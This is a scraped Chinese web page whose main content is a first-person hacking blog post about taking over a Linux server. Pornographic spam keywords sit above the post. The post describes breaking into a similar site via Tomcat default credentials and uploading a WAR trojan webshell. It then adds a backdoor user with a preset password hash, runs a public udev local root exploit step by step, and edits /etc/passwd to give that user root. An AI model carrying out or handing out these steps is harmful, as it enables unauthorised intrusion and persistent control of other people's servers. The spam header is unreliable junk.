日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
迂回攻擊戰(zhàn)術(shù)搞定linux肉雞

今天成功利用udev搞定一個(gè)linux肉雞,爽呀,沒想到我的人品已經(jīng)好到這個(gè)地步了……

成都創(chuàng)新互聯(lián)長期為1000+客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對不同對象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺,與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為硚口企業(yè)提供專業(yè)的成都做網(wǎng)站、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè),硚口網(wǎng)站改版等技術(shù)服務(wù)。擁有十余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

今天本來和ay520一起檢測一個(gè)網(wǎng)站的,無奈網(wǎng)站太過去強(qiáng)大,沒有發(fā)現(xiàn)漏洞,于是我就開始了迂回攻擊戰(zhàn)術(shù),什么是迂回攻擊?我就來小介紹一下:

通常我們攻擊一個(gè)網(wǎng)站的時(shí)候,由于不了解網(wǎng)站源碼結(jié)構(gòu),也沒有常見的漏洞,我們就可以先找出這個(gè)網(wǎng)站源碼的一些特征字符,然后利用google搜索

和這個(gè)網(wǎng)站一樣源碼的站,要攻擊的站可能沒有漏洞,但是我們搜索到的站不一定沒有漏洞,可能是配置上面的問題等,然后加以利用,成功得到shell以后

我們就可以利用shell來查看網(wǎng)站的源碼,然后再返回去攻擊目標(biāo)站點(diǎn),這樣就是我所謂的迂回了,當(dāng)然也可以是社工網(wǎng)站管理員在其它網(wǎng)站或者是論壇上面的

注冊用戶名和密碼然后再回來測試目標(biāo)站點(diǎn),最終拿下目標(biāo)站點(diǎn)就OK了。費(fèi)話不多說了,下面就開始我今天的入侵滲透之旅了……

由于目標(biāo)站點(diǎn)沒有漏洞,配置上面的漏洞也沒有,通過google搜索我找到一個(gè)和他一樣源碼的網(wǎng)站http://www.xxx.com:9999/wcm/loginpage.htm 然后進(jìn)行了常用密碼的

猜解,但是也沒有發(fā)現(xiàn)弱密碼等漏洞,于是去掉wcm以及后面的,直接http://www.xxx.com:9999/ 結(jié)果發(fā)現(xiàn)是tomcat ,經(jīng)測試用戶名和密碼為:admin/null 成功進(jìn)入以

后上傳war木馬,最后得到迂回攻擊的網(wǎng)站的webshell 運(yùn)行命令uname -a 得到服務(wù)器的內(nèi)核版本Linux www.xxx.com 2.6.18-

128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6內(nèi)核出了一個(gè)udev本地溢出漏洞,首先看一下webshell的運(yùn)行權(quán)限,命令

id,結(jié)果人品爆發(fā)了uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t,是root權(quán)

限,既然是root權(quán)限,那么我們可以通過webshell來建立一個(gè)用戶,然后利用putty來連接,進(jìn)行本地溢出提權(quán)……但是通過常用的useradd username添加的用戶密碼

為空,如果想利用passwd username來設(shè)置密碼的話,我們的webshell是無法輸入密碼的,我們就郁悶使用他的參數(shù),-p來操作了,結(jié)果搜索運(yùn)行如下命令:useradd -

p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang    //-p 后面的一串字符串是我在虛擬機(jī)中添加用戶,然后復(fù)制他的密碼來做為這里的密碼,這樣我就成功添加一個(gè)用

戶liang 打開putty  然后輸入用戶名和密碼,連接,一切ok,權(quán)限為$ 為普通用戶,下面就利用udev的溢出來進(jìn)行提權(quán)了。

我本來按照此文所寫來進(jìn)行溢出  http://www.waitalone.cn/post/466.html  結(jié)果不成功,經(jīng)查實(shí),可能是溢出代碼有問題,于是我就直接打開

http://www.milw0rm.com/exploits/8478  在putty中運(yùn)行如下命令:

[liang@www ~]$ vi  test     粘貼上面的代碼

[liang@www ~]$ wq 保存并退出

[liang@www ~]$chmod 777 test  添加任意用戶可執(zhí)行權(quán)限

[liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'}     獲得udev進(jìn)程號,結(jié)果為479,然后減1作為test參數(shù)

[liang@www ~]$sh test 478  結(jié)果返回

sh-3.2$  返回這個(gè)說明不成功,我們多試幾次

sh-3.2$ sh test 478 這樣我試了三次,還是不行

sh-3.2$ sh test 476 這次成功了,我看到了可愛的#,哈哈 人品爆炸了

然后vi /etc/passwd  把用戶名liang的 uid和gid改為0,這樣liang 就為root 權(quán)限了,哈哈。搞定收工!


網(wǎng)頁名稱:迂回攻擊戰(zhàn)術(shù)搞定linux肉雞
文章起源:http://m.5511xx.com/article/dhcdgih.html